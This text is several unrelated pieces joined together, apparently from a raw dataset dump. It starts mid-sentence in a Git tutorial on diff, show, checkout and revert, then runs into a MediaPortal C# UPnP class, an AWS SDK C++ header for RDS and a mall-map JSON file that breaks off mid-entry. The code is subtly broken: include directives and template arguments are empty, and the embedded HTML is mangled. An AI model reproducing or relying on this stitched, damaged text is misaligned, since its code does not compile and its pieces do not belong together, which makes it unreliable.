refer to previous commits. We do\nthat by adding `~1` \n(where \"~\" is \"tilde\", pronounced [**til**-d*uh*]) \nto refer to the commit one before `HEAD`.\n\n~~~\n$ git diff HEAD~1 mars.txt\n~~~\n{: .language-bash}\n\nIf we want to see the differences between older commits we can use `git diff`\nagain, but with the notation `HEAD~1`, `HEAD~2`, and so on, to refer to them:\n\n\n~~~\n$ git diff HEAD~3 mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..b36abfd 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nWe could also use `git show` which shows us what changes we made at an older commit as \nwell as the commit message, rather than the _differences_ between a commit and our \nworking directory that we see by using `git diff`.\n\n~~~\n$ git show HEAD~3 mars.txt\n~~~\n{: .language-bash}\n\n~~~\ncommit f22b25e3233b4645dabd0d81e651fe074bd8e73b\nAuthor: Vlad Dracula \nDate: Thu Aug 22 09:51:46 2013 -0400\n\n Start notes on Mars as a base\n\ndiff --git a/mars.txt b/mars.txt\nnew file mode 100644\nindex 0000000..df0654a\n--- /dev/null\n+++ b/mars.txt\n@@ -0,0 +1 @@\n+Cold and dry, but everything is my favorite color\n~~~\n{: .output}\n\nIn this way,\nwe can build up a chain of commits.\nThe most recent end of the chain is referred to as `HEAD`;\nwe can refer to previous commits using the `~` notation,\nso `HEAD~1`\nmeans \"the previous commit\",\nwhile `HEAD~123` goes back 123 commits from where we are now.\n\nWe can also refer to commits using\nthose long strings of digits and letters\nthat `git log` displays.\nThese are unique IDs for the changes,\nand \"unique\" really does mean unique:\nevery change to any set of files on any computer\nhas a unique 40-character identifier.\nOur first commit was given the ID\n`f22b25e3233b4645dabd0d81e651fe074bd8e73b`,\nso let's try this:\n\n~~~\n$ git diff f22b25e3233b4645dabd0d81e651fe074bd8e73b mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..93a3e13 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nThat's the right answer,\nbut typing out random 40-character strings is annoying,\nso Git lets us use just the first few characters (typically seven for normal size projects):\n\n~~~\n$ git diff f22b25e mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex df0654a..93a3e13 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1 +1,4 @@\n Cold and dry, but everything is my favorite color\n+The two moons may be a problem for Wolfman\n+But the Mummy will appreciate the lack of humidity\n+An ill-considered change\n~~~\n{: .output}\n\nAll right! So\nwe can save changes to files and see what we've changed. Now, how\ncan we restore older versions of things?\nLet's suppose we change our mind about the last update to\n`mars.txt` (the \"ill-considered change\").\n\n`git status` now tells us that the file has been changed,\nbut those changes haven't been staged:\n\n~~~\n$ git status\n~~~\n{: .language-bash}\n\n~~~\nOn branch master\nChanges not staged for commit:\n (use \"git add ...\" to update what will be committed)\n (use \"git checkout -- ...\" to discard changes in working directory)\n\n modified: mars.txt\n\nno changes added to commit (use \"git add\" and/or \"git commit -a\")\n~~~\n{: .output}\n\nWe can put things back the way they were\nby using `git checkout`:\n\n~~~\n$ git checkout HEAD mars.txt\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\nThe two moons may be a problem for Wolfman\nBut the Mummy will appreciate the lack of humidity\n~~~\n{: .output}\n\nAs you might guess from its name,\n`git checkout` checks out (i.e., restores) an old version of a file.\nIn this case,\nwe're telling Git that we want to recover the version of the file recorded in `HEAD`,\nwhich is the last saved commit.\nIf we want to go back even further,\nwe can use a commit identifier instead:\n\n~~~\n$ git checkout f22b25e mars.txt\n~~~\n{: .language-bash}\n\n~~~\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\n~~~\n{: .output}\n\n~~~\n$ git status\n~~~\n{: .language-bash}\n\n~~~\nOn branch master\nChanges to be committed:\n (use \"git reset HEAD ...\" to unstage)\n\n modified: mars.txt\n\n~~~\n{: .output}\n\nNotice that the changes are currently in the staging area.\nAgain, we can put things back the way they were\nby using `git checkout`:\n\n~~~\n$ git checkout HEAD mars.txt\n~~~\n{: .language-bash}\n\n> ## Don't Lose Your HEAD\n>\n> Above we used\n>\n> ~~~\n> $ git checkout f22b25e mars.txt\n> ~~~\n> {: .language-bash}\n>\n> to revert `mars.txt` to its state after the commit `f22b25e`. But be careful! \n> The command `checkout` has other important functionalities and Git will misunderstand\n> your intentions if you are not accurate with the typing. For example, \n> if you forget `mars.txt` in the previous command.\n>\n> ~~~\n> $ git checkout f22b25e\n> ~~~\n> {: .language-bash}\n> ~~~\n> Note: checking out 'f22b25e'.\n>\n> You are in 'detached HEAD' state. You can look around, make experimental\n> changes and commit them, and you can discard any commits you make in this\n> state without impacting any branches by performing another checkout.\n>\n> If you want to create a new branch to retain commits you create, you may\n> do so (now or later) by using -b with the checkout command again. Example:\n>\n> git checkout -b \n>\n> HEAD is now at f22b25e Start notes on Mars as a base\n> ~~~\n> {: .error}\n>\n> The \"detached HEAD\" is like \"look, but don't touch\" here,\n> so you shouldn't make any changes in this state.\n> After investigating your repo's past state, reattach your `HEAD` with `git checkout master`.\n{: .callout}\n\nIt's important to remember that\nwe must use the commit number that identifies the state of the repository\n*before* the change we're trying to undo.\nA common mistake is to use the number of\nthe commit in which we made the change we're trying to discard.\nIn the example below, we want to retrieve the state from before the most\nrecent commit (`HEAD~1`), which is commit `f22b25e`:\n\n![Git Checkout](../fig/git-checkout.svg)\n\nSo, to put it all together,\nhere's how Git works in cartoon form:\n\n![https://figshare.com/articles/How_Git_works_a_cartoon/1328266](../fig/git_staging.svg)\n\n> ## Simplifying the Common Case\n>\n> If you read the output of `git status` carefully,\n> you'll see that it includes this hint:\n>\n> ~~~\n> (use \"git checkout -- ...\" to discard changes in working directory)\n> ~~~\n> {: .language-bash}\n>\n> As it says,\n> `git checkout` without a version identifier restores files to the state saved in `HEAD`.\n> The double dash `--` is needed to separate the names of the files being recovered\n> from the command itself:\n> without it,\n> Git would try to use the name of the file as the commit identifier.\n{: .callout}\n\nThe fact that files can be reverted one by one\ntends to change the way people organize their work.\nIf everything is in one large document,\nit's hard (but not impossible) to undo changes to the introduction\nwithout also undoing changes made later to the conclusion.\nIf the introduction and conclusion are stored in separate files,\non the other hand,\nmoving backward and forward in time becomes much easier.\n\n> ## Recovering Older Versions of a File\n>\n> Jennifer has made changes to the Python script that she has been working on for weeks, and the\n> modifications she made this morning \"broke\" the script and it no longer runs. She has spent\n> ~ 1hr trying to fix it, with no luck...\n>\n> Luckily, she has been keeping track of her project's versions using Git! Which commands below will\n> let her recover the last committed version of her Python script called\n> `data_cruncher.py`?\n>\n> 1. `$ git checkout HEAD`\n>\n> 2. `$ git checkout HEAD data_cruncher.py`\n>\n> 3. `$ git checkout HEAD~1 data_cruncher.py`\n>\n> 4. `$ git checkout data_cruncher.py`\n>\n> 5. Both 2 and 4\n>\n>\n> > ## Solution\n> >\n> > The answer is (5)-Both 2 and 4. \n> > \n> > The `checkout` command restores files from the repository, overwriting the files in your working \n> > directory. Answers 2 and 4 both restore the *latest* version *in the repository* of the file \n> > `data_cruncher.py`. Answer 2 uses `HEAD` to indicate the *latest*, whereas answer 4 uses the \n> > unique ID of the last commit, which is what `HEAD` means. \n> > \n> > Answer 3 gets the version of `data_cruncher.py` from the commit *before* `HEAD`, which is NOT \n> > what we wanted.\n> > \n> > Answer 1 can be dangerous! Without a filename, `git checkout` will restore **all files** \n> > in the current directory (and all directories below it) to their state at the commit specified. \n> > This command will restore `data_cruncher.py` to the latest commit version, but it will also \n> > restore *any other files that are changed* to that version, erasing any changes you may \n> > have made to those files!\n> > As discussed above, you are left in a *detached* `HEAD` state, and you don't want to be there.\n> {: .solution}\n{: .challenge}\n\n> ## Reverting a Commit\n>\n> Jennifer is collaborating on her Python script with her colleagues and\n> realizes her last commit to the project's repository contained an error and\n> she wants to undo it. `git revert [erroneous commit ID]` will create a new \n> commit that reverses Jennifer's erroneous commit. Therefore `git revert` is\n> different to `git checkout [commit ID]` because `git checkout` returns the\n> files within the local repository to a previous state, whereas `git revert`\n> reverses changes committed to the local and project repositories. \n> Below are the right steps and explanations for Jennifer to use `git revert`,\n> what is the missing command?\n>\n> 1. `________ # Look at the git history of the project to find the commit ID`\n>\n> 2. Copy the ID (the first few characters of the ID, e.g. 0b1d055).\n>\n> 3. `git revert [commit ID]`\n>\n> 4. Type in the new commit message.\n>\n> 5. Save and close\n{: .challenge}\n\n> ## Understanding Workflow and History\n>\n> What is the output of the last command in\n>\n> ~~~\n> $ cd planets\n> $ echo \"Venus is beautiful and full of love\" > venus.txt\n> $ git add venus.txt\n> $ echo \"Venus is too hot to be suitable as a base\" >> venus.txt\n> $ git commit -m \"Comment on Venus as an unsuitable base\"\n> $ git checkout HEAD venus.txt\n> $ cat venus.txt #this will print the contents of venus.txt to the screen\n> ~~~\n> {: .language-bash}\n>\n> 1. ~~~\n> Venus is too hot to be suitable as a base\n> ~~~\n> {: .output}\n> 2. ~~~\n> Venus is beautiful and full of love\n> ~~~\n> {: .output}\n> 3. ~~~\n> Venus is beautiful and full of love\n> Venus is too hot to be suitable as a base\n> ~~~\n> {: .output}\n> 4. ~~~\n> Error because you have changed venus.txt without committing the changes\n> ~~~\n> {: .output}\n>\n> > ## Solution\n> >\n> > The answer is 2. \n> > \n> > The command `git add venus.txt` places the current version of `venus.txt` into the staging area. \n> > The changes to the file from the second `echo` command are only applied to the working copy, \n> > not the version in the staging area.\n> > \n> > So, when `git commit -m \"Comment on Venus as an unsuitable base\"` is executed, \n> > the version of `venus.txt` committed to the repository is the one from the staging area and\n> > has only one line.\n> > \n> > At this time, the working copy still has the second line (and \n> > `git status` will show that the file is modified). However, `git checkout HEAD venus.txt` \n> > replaces the working copy with the most recently committed version of `venus.txt`.\n> > \n> > So, `cat venus.txt` will output \n> > ~~~\n> > Venus is beautiful and full of love.\n> > ~~~\n> > {: .output}\n> {: .solution}\n{: .challenge}\n\n> ## Checking Understanding of `git diff`\n>\n> Consider this command: `git diff HEAD~9 mars.txt`. What do you predict this command\n> will do if you execute it? What happens when you do execute it? Why?\n>\n> Try another command, `git diff [ID] mars.txt`, where [ID] is replaced with\n> the unique identifier for your most recent commit. What do you think will happen,\n> and what does happen?\n{: .challenge}\n\n> ## Getting Rid of Staged Changes\n>\n> `git checkout` can be used to restore a previous commit when unstaged changes have\n> been made, but will it also work for changes that have been staged but not committed?\n> Make a change to `mars.txt`, add that change, and use `git checkout` to see if\n> you can remove your change.\n{: .challenge}\n\n> ## Explore and Summarize Histories\n>\n> Exploring history is an important part of Git, and often it is a challenge to find\n> the right commit ID, especially if the commit is from several months ago.\n>\n> Imagine the `planets` project has more than 50 files.\n> You would like to find a commit that modifies some specific text in `mars.txt`.\n> When you type `git log`, a very long list appeared.\n> How can you narrow down the search?\n>\n> Recall that the `git diff` command allows us to explore one specific file,\n> e.g., `git diff mars.txt`. We can apply a similar idea here.\n>\n> ~~~\n> $ git log mars.txt\n> ~~~\n> {: .language-bash}\n>\n> Unfortunately some of these commit messages are very ambiguous, e.g., `update files`.\n> How can you search through these files?\n>\n> Both `git diff` and `git log` are very useful and they summarize a different part of the history \n> for you.\n> Is it possible to combine both? Let's try the following:\n>\n> ~~~\n> $ git log --patch mars.txt\n> ~~~\n> {: .language-bash}\n>\n> You should get a long list of output, and you should be able to see both commit messages and \n> the difference between each commit.\n>\n> Question: What does the following command do?\n>\n> ~~~\n> $ git log --patch HEAD~9 *.txt\n> ~~~\n> {: .language-bash}\n{: .challenge}\n"} {"text": "#region Copyright (C) 2007-2018 Team MediaPortal\r\n\r\n/*\r\n Copyright (C) 2007-2018 Team MediaPortal\r\n http://www.team-mediaportal.com\r\n\r\n This file is part of MediaPortal 2\r\n\r\n MediaPortal 2 is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n MediaPortal 2 is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with MediaPortal 2. If not, see .\r\n*/\r\n\r\n#endregion\r\n\r\nusing System;\r\nusing System.Xml;\r\n\r\nnamespace UPnP.Infrastructure.Dv.DeviceTree\r\n{\r\n /// \r\n /// Defines the range of allowed numeric values for a UPnP state variable.\r\n /// \r\n public class DvAllowedValueRange\r\n {\r\n protected DvDataType _dataType;\r\n protected double _minValue;\r\n protected double _maxValue;\r\n protected double? _step;\r\n\r\n public DvAllowedValueRange(DvDataType dataType, double minValue, double maxValue) :\r\n this(dataType, minValue, maxValue, null) { }\r\n\r\n public DvAllowedValueRange(DvDataType dataType, double minValue, double maxValue, double? step)\r\n {\r\n _minValue = minValue;\r\n _maxValue = maxValue;\r\n _dataType = dataType;\r\n _step = step;\r\n }\r\n\r\n public double MinValue\r\n {\r\n get { return _minValue; }\r\n }\r\n\r\n public double MaxValue\r\n {\r\n get { return _maxValue; }\r\n }\r\n\r\n public double? Step\r\n {\r\n get { return _step; }\r\n }\r\n\r\n public bool IsValueInRange(object value)\r\n {\r\n double doubleVal = (double) Convert.ChangeType(value, typeof(double));\r\n if (doubleVal < _minValue || doubleVal > _maxValue)\r\n return false;\r\n if (_step.HasValue)\r\n {\r\n double n = (doubleVal - _minValue) / _step.Value;\r\n return (n - (int) n) < 0.001;\r\n }\r\n return true;\r\n }\r\n\r\n #region Description generation\r\n\r\n internal void AddSCPDDescriptionForValueRange(XmlWriter writer)\r\n {\r\n writer.WriteStartElement(\"allowedValueRange\");\r\n writer.WriteStartElement(\"minimum\");\r\n _dataType.SoapSerializeValue(_minValue, true, writer);\r\n writer.WriteEndElement(); // minimum\r\n writer.WriteStartElement(\"maximum\");\r\n _dataType.SoapSerializeValue(_maxValue, true, writer);\r\n writer.WriteEndElement(); // maximum\r\n if (_step.HasValue)\r\n {\r\n writer.WriteStartElement(\"step\");\r\n _dataType.SoapSerializeValue(_step.Value, true, writer);\r\n writer.WriteEndElement(); // step\r\n }\r\n writer.WriteEndElement(); // allowedValueRange\r\n }\r\n\r\n #endregion\r\n }\r\n}\r\n"} {"text": "/**\n * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n * SPDX-License-Identifier: Apache-2.0.\n */\n\n#pragma once\n#include \n#include \n#include \n#include \n\nnamespace Aws\n{\ntemplate\nclass AmazonWebServiceResult;\n\nnamespace Utils\n{\nnamespace Xml\n{\n class XmlDocument;\n} // namespace Xml\n} // namespace Utils\nnamespace RDS\n{\nnamespace Model\n{\n class AWS_RDS_API CreateDBClusterResult\n {\n public:\n CreateDBClusterResult();\n CreateDBClusterResult(const Aws::AmazonWebServiceResult& result);\n CreateDBClusterResult& operator=(const Aws::AmazonWebServiceResult& result);\n\n\n \n inline const DBCluster& GetDBCluster() const{ return m_dBCluster; }\n\n \n inline void SetDBCluster(const DBCluster& value) { m_dBCluster = value; }\n\n \n inline void SetDBCluster(DBCluster&& value) { m_dBCluster = std::move(value); }\n\n \n inline CreateDBClusterResult& WithDBCluster(const DBCluster& value) { SetDBCluster(value); return *this;}\n\n \n inline CreateDBClusterResult& WithDBCluster(DBCluster&& value) { SetDBCluster(std::move(value)); return *this;}\n\n\n \n inline const ResponseMetadata& GetResponseMetadata() const{ return m_responseMetadata; }\n\n \n inline void SetResponseMetadata(const ResponseMetadata& value) { m_responseMetadata = value; }\n\n \n inline void SetResponseMetadata(ResponseMetadata&& value) { m_responseMetadata = std::move(value); }\n\n \n inline CreateDBClusterResult& WithResponseMetadata(const ResponseMetadata& value) { SetResponseMetadata(value); return *this;}\n\n \n inline CreateDBClusterResult& WithResponseMetadata(ResponseMetadata&& value) { SetResponseMetadata(std::move(value)); return *this;}\n\n private:\n\n DBCluster m_dBCluster;\n\n ResponseMetadata m_responseMetadata;\n };\n\n} // namespace Model\n} // namespace RDS\n} // namespace Aws\n"} {"text": "{\n\t\"mapwidth\": \"1000\",\n\t\"mapheight\": \"600\",\n\t\"categories\": [\n\t\t{\n\t\t\t\"id\": \"food\",\n\t\t\t\"title\": \"Fast-foods & Restaurants\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"false\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"dep\",\n\t\t\t\"title\": \"Department Stores\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"clothing\",\n\t\t\t\"title\": \"Clothing & Accessories\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"health\",\n\t\t\t\"title\": \"Health & Cosmetics\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"misc\",\n\t\t\t\"title\": \"Miscellaneous\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t}\n\t],\n\t\"levels\": [\n\t\t{\n\t\t\t\"id\": \"basement-floor\",\n\t\t\t\"title\": \"Basement\",\n\t\t\t\"map\": \"images/mall/mall-underground.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-underground-mini.jpg\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"gap\",\n\t\t\t\t\t\"title\": \"GAP\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/gap.jpg\",\n\t\t\t\t\t\"x\": \"0.3781\",\n\t\t\t\t\t\"y\": \"0.4296\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"petco\",\n\t\t\t\t\t\"title\": \"Petco\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/petco.jpg\",\n\t\t\t\t\t\"x\": \"0.5163\",\n\t\t\t\t\t\"y\": \"0.3050\"\n\t\t\t\t}\n\t\t\t]\n\t\t},\n\t\t{\n\t\t\t\"id\": \"ground-floor\",\n\t\t\t\"title\": \"Ground Floor\",\n\t\t\t\"map\": \"images/mall/mall-ground.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-ground-mini.jpg\",\n\t\t\t\"show\": \"true\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sears\",\n\t\t\t\t\t\"title\": \"Sears\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"

Sears depártment store

\\\"Mapplic\\\"\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sears.jpg\",\n\t\t\t\t\t\"x\": \"0.7935\",\n\t\t\t\t\t\"y\": \"0.2736\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"macys\",\n\t\t\t\t\t\"title\": \"Macy's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Macy's department store\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/macys.jpg\",\n\t\t\t\t\t\"x\": \"0.2021\",\n\t\t\t\t\t\"y\": \"0.5847\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"jcpenney\",\n\t\t\t\t\t\"title\": \"JCPenney\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"JCPenney department store\",\n\t\t\t\t\t\"image\": \"images/hq.jpg\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/jcpenney.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.6651\",\n\t\t\t\t\t\"y\": \"0.6734\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"walgreens\",\n\t\t\t\t\t\"title\": \"Walgreens\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"At the corner of Happy & Healthy\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/walgreens.jpg\",\n\t\t\t\t\t\"x\": \"0.4611\",\n\t\t\t\t\t\"y\": \"0.5426\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sephora\",\n\t\t\t\t\t\"title\": \"Sephora\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Makeup, fragrance, skincare\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sephora.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.7504\",\n\t\t\t\t\t\"y\": \"0.5211\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"belk\",\n\t\t\t\t\t\"title\": \"Belk\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"

Lorem ipsum

\\\"Mapplic\\\"\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/belk.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.3947\",\n\t\t\t\t\t\"y\": \"0.5444\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"hnm\",\n\t\t\t\t\t\"title\": \"H&M\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/hm.jpg\",\n\t\t\t\t\t\"x\": \"0.5431\",\n\t\t\t\t\t\"y\": \"0.5240\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"oldnavy\",\n\t\t\t\t\t\"title\": \"Old Navy\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/oldnavy.jpg\",\n\t\t\t\t\t\"x\": \"0.3688\",\n\t\t\t\t\t\"y\": \"0.3909\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sportchek\",\n\t\t\t\t\t\"title\": \"Sport Chek\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"\\\"Mapplic\\\"

Lorem ipsum

\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sportchek.jpg\",\n\t\t\t\t\t\"x\": \"0.6243\",\n\t\t\t\t\t\"y\": \"0.3055\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"starbucks\",\n\t\t\t\t\t\"title\": \"Starbucks\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"The coffee company\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/starbucks.jpg\",\n\t\t\t\t\t\"x\": \"0.6445\",\n\t\t\t\t\t\"y\": \"0.4478\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"zara\",\n\t\t\t\t\t\"title\": \"Zara\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"\\\"Mapplic\\\"

Lorem ipsum

\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/zara.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.4785\",\n\t\t\t\t\t\"y\": \"0.3173\"\n\t\t\t\t}\n\t\t\t]\n\t\t},\n\t\t{\n\t\t\t\"id\": \"first-floor\",\n\t\t\t\"title\": \"First Floor\",\n\t\t\t\"map\": \"images/mall/mall-level1.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-level1-mini.jpg\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"applebees\",\n\t\t\t\t\t\"title\": \"Applebee's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"See you tomorrow\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/applebees.jpg\",\n\t\t\t\t\t\"x\": \"0.7465\",\n\t\t\t\t\t\"y\": \"0.2769\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"kfc\",\n\t\t\t\t\t\"title\": \"KFC\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Kentucky Fried Chicken\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/kfc.jpg\",\n\t\t\t\t\t\"x\": \"0.7488\",\n\t\t\t\t\t\"y\": \"0.4997\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"mcdonalds\",\n\t\t\t\t\t\"title\": \"McDonald's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/mcdonalds.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.7374\",\n\t\t\t\t\t\"y\": \"0.3918\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"pizzahut\",\n\t\t\t\t\t\"title\": \"Pizza Hut\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Make it great\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/pizzahut.jpg\",\n\t\t\t\t\t\"x\": \"0.6267\",\n\t\t\t\t\t\"y\": \"0.3151\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"subway\",\n\t\t\t\t\t\"title\": \"Subway\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Eat fresh.\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/subway.jpg\",\n\t\t\t\t\t\"x\": \"0.7092\",\n\t\t\t\t\t\"y\": \"0.5232\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"cvs\",\n\t\t\t\t\t\"title\": \"CVS Pharmacy\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum dolor sit amet, consectetur.\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/cvs.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.5104\",\n\t\t\t\t\t\"y\": \"0.2771\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"pullnbear\",\n\t\t\t\t\t\"title\": \"Pull & Bear\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/pullbear.jpg\",\n\t\t\t\t\t\"x\": \"0.4846\",\n\t\t\t\t\t\"y\": \"0.3246\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"amc\",\n\t\t\t\t\t\"title\": \"AMC Theatres\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/amc.jpg\",\n\t\t\t\t\t\"x\": \"0.6640\",\n\t\t\t\t\t\"y\": \"0.6426\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"atnt\",\n\t\t\t\t\t\"title\": \"AT&T\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": 